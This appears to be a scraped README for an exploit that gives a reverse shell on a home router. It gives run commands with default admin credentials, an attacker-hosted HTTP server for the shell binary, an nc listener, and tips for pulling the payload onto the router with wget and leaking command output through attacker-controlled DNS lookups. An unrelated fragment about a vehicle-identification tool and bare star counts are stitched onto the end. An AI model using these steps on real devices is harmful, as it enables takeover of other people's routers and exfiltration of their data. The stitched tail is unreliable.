# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
Leads for leaking command output
Look for file paths that are displayed within the web interface that command output can be written to. Using /tmp/ping.log to view the output at /Ping.asp.
Use wget to download reverse shell binary to the router.
Config the attacker as the DNS server and force the router to issue DNS requests with the command output. Like nslookup `whoami`.fake.domain
TODOs
Use argparse and make the exploit an executable.
Unsolved Mysteries
If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?
Vehicle Identification Speed Detection (VISD) extracts vehicle information like License Plate number, Manufacturer and colour from a video and provides this data in the form of a CSV file. VISD can a
318 Jan 03, 2023
15 Dec 18, 2022
43 Nov 22, 2022
3 Oct 04, 2022
119 Dec 27, 2022
19 Oct 20, 2022
189 Dec 27, 2022
0 Feb 20, 2022
6 Feb 22, 2022
2 Dec 22, 2021
1.7k Jan 03, 2023
1 Mar 04, 2022
10 Dec 29, 2022
931 Jan 07, 2023
1 Feb 10, 2022
2 Apr 03, 2022
35 Feb 15, 2021
0 Aug 03, 2021
189 Dec 13, 2022
4 Apr 20, 2022